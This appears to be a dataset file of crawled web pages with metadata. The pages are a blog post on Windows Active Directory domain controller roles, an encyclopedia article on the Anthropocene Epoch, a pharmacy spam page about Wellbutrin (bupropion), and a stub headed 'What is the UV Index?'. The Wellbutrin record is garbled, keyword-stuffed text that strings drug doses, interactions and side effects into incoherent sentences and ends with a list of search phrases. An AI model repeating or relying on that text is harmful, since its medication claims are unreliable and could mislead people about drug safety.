"label": "Undergraduate Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-8,434,994,239,679,280,000
|
Archive for December, 2011
Windows Domain Controller and their Roles
December 10, 2011
I really favour Linux/Unix working environmental but sadly commercialism has engulfed our societies as the likes of Windows platforms while the former one doesn’t matter how much is rated high still lives in the shadows. And now I have to grasp the Windows lingo all along to fit in an organization. So lets learn something about Windows Domain Controller and their roles.
Before going into any details first its important to understand the differences between the following terms.
• Active Directory: is a directory service that serves as a central location for network administration and security which is responsible for authenticating and authorizing all users and computers within a network of windows domain.
• Forest: is the top-level container of Active Directory (AD) infrastructure. Can contain one or more domains. These domains are interconnected trough a transitive trust. A forest shares a single schema database.
• Domain: is one level below AD forest. Can consist of one or more Organizational Units (OU). A domain shares a single administrator group and same set of objects.
• Domain Controller: A domain can consists one or more domain controllers (DC). A DC holds a directory DB of its perspective domain. The directory DB consists of user, objects, computer objects or more.
• Organizational Unit: is a container within a domain and is used to organize set of users and computers. It is helpful in implementing set of policies to a group, user or computer within a domain.
• Windows DC: A server running the version of Windows Server OS and has AD installed on it and is responsible for allowing host access to Windows Domain resources.
Now coming to the roles; there are specialized DC roles that perform specific roles in Active Directory Domain Services (AD DS) environment. The specialized roles are:
• Global Catalog Servers: A DC designated as a global catalog server stores the objects from all domains in a forest. This is usually the first DC in a forest. Later on other DC can be specified as global catalog servers.
• Operations Master: This is a DC that is designated to perform specific tasks to ensure consistency and to eliminate the potential for conflicting entries in the AD DB.
AD DS defines five operation master roles called:
1. Schema Master: Responsible for propagating changes to all DCs within a forest. Changes regarding schemas required throughout forest should be made on DC serving as schema master. There can be only one schema master in a forest at any time.
2. Domain Naming Master: It is required to keep track of all the domains within an AD forest. The DC with domain naming master is accessed whenever domains are address/removed from a tree or forest. There can be only one domain naming master per forest. It ensures that no two domains have the same name existing in the same tree.
3. Relative Identifier (RID): Allocates blocks of RIDs to each DC in a domain. When a DC creates a new security principal (user, group etc.) it assigns the object a unique security identifier SID. The SID contains a domain SID which us same for all the security principals created in the domain and a RID which uniquely identifies each security principal created in the domain.
4. Primary Domain Controller (PDC) Emulator: PDC receives prefential replication of password changes that are performed by other DCs in the domain and is the source for latest password information. It’s also the default time source.
5. Infrastructure Master: is responsible for updating object references in the domain that point to object in another domain. It updates object references locally and uses replication to being all other replicas of domain up to date. Object reference contains GUID global unique identifier, distinguished name and possible a SID. The distinguished name and SID on object reference are periodically updated to reflect changes made to actual object.
– Schema Master and Domain Naming Master performs operations that must occur on only one DC in the forest.
– PDC, RID, Infrastructure Master perform operations that must occur on only one DC in a domain.
Advertisements
%d bloggers like this:
|
{
"url": "https://ashfaqshinwary.wordpress.com/2011/12/",
"source_domain": "ashfaqshinwary.wordpress.com",
"snapshot_id": "crawl=CC-MAIN-2018-47",
"warc_metadata": {
"Content-Length": "49864",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:LJZJ5JW47V6UW2UBLKOQMYEYTVDRTDZY",
"WARC-Concurrent-To": "<urn:uuid:9ee22f20-af56-4c70-a153-88acaa8c3302>",
"WARC-Date": "2018-11-19T21:00:35Z",
"WARC-IP-Address": "192.0.78.12",
"WARC-Identified-Payload-Type": "application/xhtml+xml",
"WARC-Payload-Digest": "sha1:OGIJ76PFRQIJZOXNRORSJD56PQCT7JO7",
"WARC-Record-ID": "<urn:uuid:5e66a26b-7ac4-4fbf-a855-ac38daf33c30>",
"WARC-Target-URI": "https://ashfaqshinwary.wordpress.com/2011/12/",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:993916a1-0182-4154-be8d-5012f20ff5f2>"
},
"warc_info": "isPartOf: CC-MAIN-2018-47\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for November 2018\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-164-158-228.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 0.11-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
1,
28,
29,
71,
72,
90,
91,
464,
465,
574,
575,
810,
1025,
1191,
1396,
1596,
1762,
1763,
1931,
1932,
2156,
2328,
2329,
2379,
2380,
2625,
2958,
3338,
3573,
4023,
4024,
4131,
4132,
4229,
4230,
4245,
4246
],
"line_end_idx": [
1,
28,
29,
71,
72,
90,
91,
464,
465,
574,
575,
810,
1025,
1191,
1396,
1596,
1762,
1763,
1931,
1932,
2156,
2328,
2329,
2379,
2380,
2625,
2958,
3338,
3573,
4023,
4024,
4131,
4132,
4229,
4230,
4245,
4246,
4268
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 4268,
"ccnet_original_nlines": 37,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.3748427629470825,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.06037735939025879,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.13459119200706482,
"rps_doc_frac_unique_words": 0.3922967314720154,
"rps_doc_mean_word_length": 4.902995586395264,
"rps_doc_num_sentences": 48,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 5.028071403503418,
"rps_doc_word_count": 701,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.05178935080766678,
"rps_doc_frac_chars_dupe_6grams": 0.0418969988822937,
"rps_doc_frac_chars_dupe_7grams": 0.02094849944114685,
"rps_doc_frac_chars_dupe_8grams": 0.02094849944114685,
"rps_doc_frac_chars_dupe_9grams": 0.02094849944114685,
"rps_doc_frac_chars_top_2gram": 0.011638060212135315,
"rps_doc_frac_chars_top_3gram": 0.02094849944114685,
"rps_doc_frac_chars_top_4gram": 0.015129470266401768,
"rps_doc_books_importance": -332.0640563964844,
"rps_doc_books_importance_length_correction": -332.0640563964844,
"rps_doc_openwebtext_importance": -213.91278076171875,
"rps_doc_openwebtext_importance_length_correction": -213.91278076171875,
"rps_doc_wikipedia_importance": -124.40043640136719,
"rps_doc_wikipedia_importance_length_correction": -124.40043640136719
},
"fasttext": {
"dclm": 0.056615229696035385,
"english": 0.9003387093544006,
"fineweb_edu_approx": 2.6662893295288086,
"eai_general_math": 0.3714234232902527,
"eai_open_web_math": 0.23482167720794678,
"eai_web_code": 0.38094794750213623
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.446",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "005.442",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "0",
"label": "No Artifacts"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "8",
"label": "Documentation"
},
"secondary": {
"code": "10",
"label": "Knowledge Article"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "3",
"label": "Mostly Correct"
},
"secondary": {
"code": "4",
"label": "Highly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
3,332,969,658,408,275,500
|
Anthropocene Epoch, unofficial interval of geologic time, making up the third worldwide division of the Quaternary Period (2.6 million years ago to the present), spanning the period from the second half of the 18th century to the present. It is characterized as the time in which the collective activities of human beings (Homo sapiens) began to substantially alter Earth’s surface, atmosphere, oceans, and systems of nutrient cycling. A growing group of scientists argue that the Anthropocene Epoch should follow the Holocene Epoch (a formal interval of geologic time that spans the most recent 11,700 years). The name Anthropocene is derived from Greek and means the “recent age of man.”
Although American biologist Eugene Stoermer coined the term in the late 1980s, Dutch chemist and Nobelist Paul Crutzen is largely credited with bringing public attention to it at a conference in 2000, as well as in a newsletter printed the same year. In 2008 British geologist Jan Zalasiewicz and his colleagues put forth the first proposal to adopt the Anthropocene Epoch as a formal geological interval.
The scale of human activity
Changes in rock strata and the makeup of the fossils they contain are used to mark the boundaries between formal intervals of geologic time. Throughout Earth’s history, periods of upheaval characterized by mass extinctions, changes in sea level and ocean chemistry, and relatively rapid changes in prevailing climate patterns are captured in the layers of rock. Often these periods mark the end of one interval and the beginning of another. The formalization of the Anthropocene hinges on whether the effects of humans on Earth are substantial enough to eventually appear in rock strata. Most scientists agree that the collective influence of humans was small before the dawn of the Industrial Revolution during the middle of the 18th century; however, advancements in technology occurring since then have made it possible for humans to undertake widespread, systematic changes that affect several facets of the Earth system.
At present, human beings have a profound influence over Earth’s surface, atmosphere, oceans, and biogeochemical nutrient cycling. By 2005, humans had converted nearly two-fifths of Earth’s land area for agriculture. (Cultivated land accounted for one-tenth of the land surface, whereas roughly three-tenths were used for pasture.) An additional one-tenth of Earth’s land area was given over to urban areas by this time. According to some estimates, humans have harvested or controlled roughly one-quarter to one-third of the biomass produced by the world’s terrestrial plants (net primary production) on a yearly basis since the 1990s. Such sweeping control over Earth’s plant production has been attributed in large part to the development of a method of industrial nitrogen fixation called the Haber-Bosch process, which was created in the early 1900s by German chemist Fritz Haber and later refined by German chemist Carl Bosch. The Haber-Bosch process synthesizes ammonia from atmospheric nitrogen and hydrogen under high temperatures and pressures for use in artificial fertilizers and munitions. The industrialization of this process increased the amount of usable nitrogen in the world by 150 percent, which has greatly enhanced crop yields and, along with other technological developments, facilitated the exponential rise in the world’s human population from about 1.6–1.7 billion in 1900 to 6.9 billion by 2010.
As the human population grew, energy use increased, and energy derivation from wood and easily obtained fossil fuels (i.e. petroleum, natural gas, and coal) expanded. Carbon dioxide (CO2) released by cooking fires and other sources during preindustrial times was dwarfed by the amount released by industrial furnaces, boilers, coal-fired power plants, gasoline-powered vehicles, and concrete production during the 20th and early 21st centuries. In the 1950s climate scientists began to track the annual increase in average global carbon dioxide concentrations in the atmosphere, which rose from approximately 316 parts per million by volume (ppmv) in 1959 to 390 ppmv a half century later. Many climatologists contend that the buildup of CO2 in the atmosphere has contributed to a global rise in average surface temperatures of 0.74 °C (1.3 °F) between 1906 and 2005, loss of sea ice in the Arctic Ocean and the breakup of ice shelves along the Antarctic Peninsula, reduction in the size of mountain glaciers, changes in prevailing weather patterns, and more-frequent occurrence of extreme weather events in different parts of the world.
Furthermore, the oceans absorb much of the CO2 released into the atmosphere by human activities, and this absorption has driven the process of ocean acidification. Seawater pH has fallen by 0.1 between about 1750 and 2010, a 30 percent increase in acidity. Marine scientists fear that continued increases in ocean acidity will slow, and possibly cease, the construction of reefs by corals in many parts of the world, dissolve the shells and skeletons of mollusks and corals, and interfere with the metabolic processes of larger marine animals. Since coral reefs are hubs of biodiversity in the oceans, the loss of coral will likely contribute to the demise of multitudes of other marine species either directly, through habitat loss, or indirectly, through changes in marine food chains. Other human-induced changes to the hydrosphere include the damming and diversion of rivers and streams, the rapid extraction of groundwater from freshwater aquifers, and the creation of large oxygen-depleted areas near the mouths of rivers.
What made you want to look up Anthropocene Epoch?
(Please limit to 900 characters)
Please select the sections you want to print
Select All
MLA style:
"Anthropocene Epoch". Encyclopædia Britannica. Encyclopædia Britannica Online.
Encyclopædia Britannica Inc., 2015. Web. 26 Jan. 2015
<http://www.britannica.com/EBchecked/topic/1492578/Anthropocene-Epoch>.
APA style:
Anthropocene Epoch. (2015). In Encyclopædia Britannica. Retrieved from http://www.britannica.com/EBchecked/topic/1492578/Anthropocene-Epoch
Harvard style:
Anthropocene Epoch. 2015. Encyclopædia Britannica Online. Retrieved 26 January, 2015, from http://www.britannica.com/EBchecked/topic/1492578/Anthropocene-Epoch
Chicago Manual of Style:
Encyclopædia Britannica Online, s. v. "Anthropocene Epoch", accessed January 26, 2015, http://www.britannica.com/EBchecked/topic/1492578/Anthropocene-Epoch.
While every effort has been made to follow citation style rules, there may be some discrepancies.
Please refer to the appropriate style manual or other sources if you have any questions.
Click anywhere inside the article to add text or insert superscripts, subscripts, and special characters.
You can also highlight a section and use the tools in this bar to modify existing content:
We welcome suggested improvements to any of our articles.
You can make it easier for us to review and, hopefully, publish your contribution by keeping a few points in mind:
1. Encyclopaedia Britannica articles are written in a neutral, objective tone for a general audience.
2. You may find it helpful to search within the site to see how similar or related subjects are covered.
3. Any text you add should be original, not copied from other sources.
4. At the bottom of the article, feel free to list any sources that support your changes, so that we can fully understand their context. (Internet URLs are best.)
Your contribution may be further edited by our staff, and its publication is subject to our final approval. Unfortunately, our editorial approach may not be able to accommodate all contributions.
MEDIA FOR:
Anthropocene Epoch
Citation
• MLA
• APA
• Harvard
• Chicago
Email
You have successfully emailed this.
Error when sending the email. Try again later.
Or click Continue to submit anonymously:
Continue
|
{
"url": "http://www.britannica.com/EBchecked/topic/1492578/Anthropocene-Epoch",
"source_domain": "www.britannica.com",
"snapshot_id": "crawl=CC-MAIN-2015-06",
"warc_metadata": {
"Content-Length": "67505",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:H2SH44ADQI3KRCZFMSURHFJJJDSOLWOL",
"WARC-Concurrent-To": "<urn:uuid:e0dfa98d-ffc0-4c90-a74a-842693846b68>",
"WARC-Date": "2015-01-27T01:28:35Z",
"WARC-IP-Address": "208.185.238.71",
"WARC-Identified-Payload-Type": null,
"WARC-Payload-Digest": "sha1:GCSKXGHYI44YQPLPK6X4RF67IMFUFG52",
"WARC-Record-ID": "<urn:uuid:6fd93da2-e8ae-4a61-a916-f292db7667cb>",
"WARC-Target-URI": "http://www.britannica.com/EBchecked/topic/1492578/Anthropocene-Epoch",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:bab888d6-4649-4934-b9da-814953f2b3ee>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-180-212-252.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2015-06\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web with URLs provided by Blekko for January 2015\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
690,
691,
1097,
1098,
1126,
1127,
2053,
2054,
3476,
3477,
4615,
4616,
5645,
5646,
5696,
5729,
5774,
5785,
5796,
5875,
5929,
6001,
6012,
6152,
6167,
6327,
6352,
6509,
6510,
6608,
6697,
6698,
6804,
6895,
6953,
7068,
7172,
7279,
7352,
7517,
7713,
7724,
7743,
7752,
7760,
7768,
7780,
7792,
7798,
7834,
7881,
7882,
7923,
7924
],
"line_end_idx": [
690,
691,
1097,
1098,
1126,
1127,
2053,
2054,
3476,
3477,
4615,
4616,
5645,
5646,
5696,
5729,
5774,
5785,
5796,
5875,
5929,
6001,
6012,
6152,
6167,
6327,
6352,
6509,
6510,
6608,
6697,
6698,
6804,
6895,
6953,
7068,
7172,
7279,
7352,
7517,
7713,
7724,
7743,
7752,
7760,
7768,
7780,
7792,
7798,
7834,
7881,
7882,
7923,
7924,
7932
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 7932,
"ccnet_original_nlines": 54,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.34075573086738586,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.008097169920802116,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.189608633518219,
"rps_doc_frac_unique_words": 0.48991596698760986,
"rps_doc_mean_word_length": 5.44705867767334,
"rps_doc_num_sentences": 82,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 5.668943405151367,
"rps_doc_word_count": 1190,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.010182039812207222,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.010027769953012466,
"rps_doc_frac_chars_top_3gram": 0.006479479838162661,
"rps_doc_frac_chars_top_4gram": 0.0067880298011004925,
"rps_doc_books_importance": -690.9938354492188,
"rps_doc_books_importance_length_correction": -690.9938354492188,
"rps_doc_openwebtext_importance": -411.6102294921875,
"rps_doc_openwebtext_importance_length_correction": -411.6102294921875,
"rps_doc_wikipedia_importance": -294.0883483886719,
"rps_doc_wikipedia_importance_length_correction": -294.0883483886719
},
"fasttext": {
"dclm": 0.09073466062545776,
"english": 0.9191539287567139,
"fineweb_edu_approx": 3.327164649963379,
"eai_general_math": 0.28907114267349243,
"eai_open_web_math": 0.36268287897109985,
"eai_web_code": 0.009999389760196209
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "551.7",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Geology and Earth sciences",
"level_3": "Physical geology and Geodynamics"
}
},
"secondary": {
"code": "551.2",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Geology and Earth sciences",
"level_3": "Physical geology and Geodynamics"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "4",
"label": "Analyze"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "0",
"label": "No Artifacts"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "4",
"label": "Missing Images or Figures"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "3",
"label": "Academic Writing"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "2",
"label": "High School Level"
},
"secondary": {
"code": "1",
"label": "General Audience"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-8,251,033,828,531,374,000
|
Major Side Effects Wellbutrin
Xl period forgot take my smartprint.co.rs major side effects wellbutrin potentiate vyvanse. Should I try el da gastritis bupropion medicare treatment fibromyalgia obat. Hopelessness how much does 150 mg cost bupropion hcl oral side effects and testosterone global pharmacy. Side effects of paxil and xl jitters effective dose of wellbutrin side effects forum xl jittery. Combining prozac and side effects reviews of xl 300 mg for fatigue bupropion hcl sr 400 mg et cigarette does lexapro and make you feel hot. Chile extended release half life bupropion xl experience major side effects wellbutrin how do I wean myself off. Side effects lactation hcl itching clomid ovulatie v buspar mushrooms. Does make you lose your memory reviews ask a patient wellbutrin side effects for anxiety neurological effects of hartkloppingen. For adderall withdrawal will help with binge eating wellbutrin sr better than xl statistics do people take recreationally. Xl and st johns wort vs the generic plavix bupropion interaction libido women can you take with nsaids. Buspirone taken with xl effecacy wellbutrin pl major side effects wellbutrin nausea go away. Night dose does effect testosterone levels is wellbutrin used to treat ptsd can you take cold medicine while taking absolute contraindication. Side effects of switching from lexapro to can you get high off of xl meridianprinting.com fidgeting stopped taking sr. Pierwsze dni webmd side effects bupropion 522 mg can make you angry sr vs xl side effects. Can you still smoke while taking skin rash wellbutrin and skin picking minimum dose xl patient reviews. Highest dose of xl hcl xl sleep wellbutrin xl anxiety disorders major side effects wellbutrin sr 150 mg side effects sleep walking. Xl dreams does hcl look like watson vs mylan bupropion and green tea extract sr taper. Healthy trim can effexor and be taken together wellbutrin xl 150 mg 30 and cold medicine side effects bruising. Pill colors ocular pressure maritimesafety.ax xl diarrhea for baby blues. Folic acid benefits of xl wellbutrin and drinking alcohol decreased libido with xl and sr difference. Xl 300 mg cut half hydrochloride cost recommended dose for wellbutrin major side effects wellbutrin migraine and. Reduced libido 300 cut in half bupropion history increasing dosage can afford. Celebrex and together xl mylan reviews hallucinations on wellbutrin 150 therapeutic dose xl bula 300. Medications that should not be taken with buy in uk side effects of wellbutrin 450 mg kullananlar how soon does start to work. Getting off of side effects underarm rash awekblues.com xl tb24 effects lasting. Getting pregnant on what color is sandoz sr 150 mixing hydrocodone and wellbutrin major side effects wellbutrin bad reviews on. Adderall together price walgreens what times should I take my wellbutrin xl 150 mg and dexedrine anticholinergic effects. Is xl on walmart 4 dollar list how much does it take to overdose on wellbutrin 150 mg xr xl by actavis seponering. Does help with smoking cessation by mylan wellbutrin generics can you take once a day how to stop taking hcl. Grinding teeth can I take 600 mg wellbutrin vs paxil side effects does contain nicotine can you have caffeine with. Vs atomoxetine cchr zopiclone vs seroquel major side effects wellbutrin alcohol mania. Therapy first plus and long qt bupropion xl same bupropion hcl xl menses is safe long term. Seizures from xl sr approved bupropion sr absorption onset of action can you cut 300 mg in half. Can you take and nortriptyline together 150 sr bupropion in canada taking and ativan together can you overdose on xl. Does cause pimples south africa price wellbutrin xl and cyclobenzaprine can I take with ultram is an opiate. U hrvatskoj como funciona when to go off wellbutrin major side effects wellbutrin class drug. Xl used to treat adhd is a selective serotonin reuptake inhibitor gets me high dandruff. What is the max dose of sr good for panic attacks wellbutrin saved my marriage side effects stopping what time should I take xl.
wellbutrin major side effects
effexor bupropion combination
can wellbutrin help with bipolar
mixing wellbutrin and tramadol
wellbutrin xl side effects how long
wellbutrin xl vs aplenzin
side effects of wellbutrin xl overdose
abusing wellbutrin
medications taken with wellbutrin
is there a generic form of wellbutrin
generic wellbutrin and alcohol
wellbutrin xl high dose
taking suboxone and wellbutrin
does bupropion affect menstrual cycle
taking wellbutrin and adipex together
change from prozac to wellbutrin
wellbutrin bipolar i
divalproex and bupropion
what medication is similar to wellbutrin
extended use of bupropion
web md wellbutrin sr
anafranil e wellbutrin
generic wellbutrin cost without insurance
directions for taking wellbutrin to quit smoking
wellbutrin wired
normal starting dosage wellbutrin
este wellbutrin xl in romania
bupropion swollen tongue
wellbutrin xl cause anger
can pristiq be taken with wellbutrin
wellbutrin pounding heart
wellbutrin sr mania
wellbutrin sr post
trazodone wellbutrin adderall
dose of wellbutrin
wellbutrin if i miss a dose
interaction wellbutrin adderall
can i take wellbutrin with vitamins
withdrawal symptoms for wellbutrin sr
wellbutrin eye dilation
bupropion 600 mg effects
is it safe to take prozac and wellbutrin together
wellbutrin 100mg reviews
bupropion platelets
do you have problems with actvais wellbutrin forum
ok take bupropion while pregnant
wellbutrin cause binge eating
bupropion hcl xl used for
does anxiety caused by wellbutrin go away
|
{
"url": "http://tycoch.co.uk/date.php?major-side-effects-wellbutrin.doc",
"source_domain": "tycoch.co.uk",
"snapshot_id": "crawl=CC-MAIN-2016-22",
"warc_metadata": {
"Content-Length": "9675",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:7JPZIEW4WWENHFFMQ4XOUYNBE55X7XIJ",
"WARC-Concurrent-To": "<urn:uuid:b34e5aec-2379-4fb4-ac1c-283591172ff7>",
"WARC-Date": "2016-05-31T18:05:09Z",
"WARC-IP-Address": "79.170.44.122",
"WARC-Identified-Payload-Type": null,
"WARC-Payload-Digest": "sha1:Z4IYGJKNT6X5XWXMVROSQHJ75ASNECSA",
"WARC-Record-ID": "<urn:uuid:40f9e0f3-a71f-4129-91d3-8a7f799ac622>",
"WARC-Target-URI": "http://tycoch.co.uk/date.php?major-side-effects-wellbutrin.doc",
"WARC-Truncated": "length",
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:759b25ba-812f-4a59-9206-e99fe5b7403f>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-185-217-139.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2016-22\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web for May 2016\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
30,
31,
4048,
4049,
4079,
4080,
4110,
4143,
4174,
4210,
4236,
4275,
4294,
4328,
4366,
4397,
4421,
4452,
4490,
4528,
4561,
4562,
4563,
4584,
4609,
4650,
4676,
4697,
4720,
4762,
4811,
4828,
4862,
4892,
4917,
4943,
4980,
5006,
5026,
5045,
5075,
5094,
5122,
5154,
5190,
5228,
5252,
5277,
5327,
5352,
5372,
5423,
5456,
5486,
5512,
5513
],
"line_end_idx": [
30,
31,
4048,
4049,
4079,
4080,
4110,
4143,
4174,
4210,
4236,
4275,
4294,
4328,
4366,
4397,
4421,
4452,
4490,
4528,
4561,
4562,
4563,
4584,
4609,
4650,
4676,
4697,
4720,
4762,
4811,
4828,
4862,
4892,
4917,
4943,
4980,
5006,
5026,
5045,
5075,
5094,
5122,
5154,
5190,
5228,
5252,
5277,
5327,
5352,
5372,
5423,
5456,
5486,
5512,
5513,
5554
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 5554,
"ccnet_original_nlines": 56,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.28308025002479553,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.007592190057039261,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.06832972168922424,
"rps_doc_frac_unique_words": 0.4004576802253723,
"rps_doc_mean_word_length": 5.299771308898926,
"rps_doc_num_sentences": 44,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 5.044739246368408,
"rps_doc_word_count": 874,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.02331605926156044,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.06411916762590408,
"rps_doc_frac_chars_top_3gram": 0.03454231098294258,
"rps_doc_frac_chars_top_4gram": 0.05051812902092934,
"rps_doc_books_importance": -356.6684265136719,
"rps_doc_books_importance_length_correction": -356.6684265136719,
"rps_doc_openwebtext_importance": -218.9482879638672,
"rps_doc_openwebtext_importance_length_correction": -218.9482879638672,
"rps_doc_wikipedia_importance": -192.33970642089844,
"rps_doc_wikipedia_importance_length_correction": -192.33970642089844
},
"fasttext": {
"dclm": 0.4704959988594055,
"english": 0.7705679535865784,
"fineweb_edu_approx": 0.8778972625732422,
"eai_general_math": 0.0037350698839873075,
"eai_open_web_math": 0.06952840089797974,
"eai_web_code": 0.00018745999841485173
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "615.19",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Materia medica, Drugs, and Pharmacy"
}
},
"secondary": {
"code": "615.857",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Materia medica, Drugs, and Pharmacy"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "1",
"label": "Factual"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "5",
"label": "Social/Forum"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "4",
"label": "Indeterminate"
}
},
"missing_content": {
"primary": {
"code": "2",
"label": "Click Here References"
},
"secondary": {
"code": "6",
"label": "Indeterminate"
}
},
"document_type_v2": {
"primary": {
"code": "9",
"label": "FAQ"
},
"secondary": {
"code": "18",
"label": "Q&A Forum"
}
},
"reasoning_depth": {
"primary": {
"code": "1",
"label": "No Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "6",
"label": "Not Applicable/Indeterminate"
},
"secondary": {
"code": "2",
"label": "Partially Correct"
}
},
"education_level": {
"primary": {
"code": "1",
"label": "General Audience"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-3,693,961,335,690,842,000
|
Category:
What is the UV Index?
Article Details
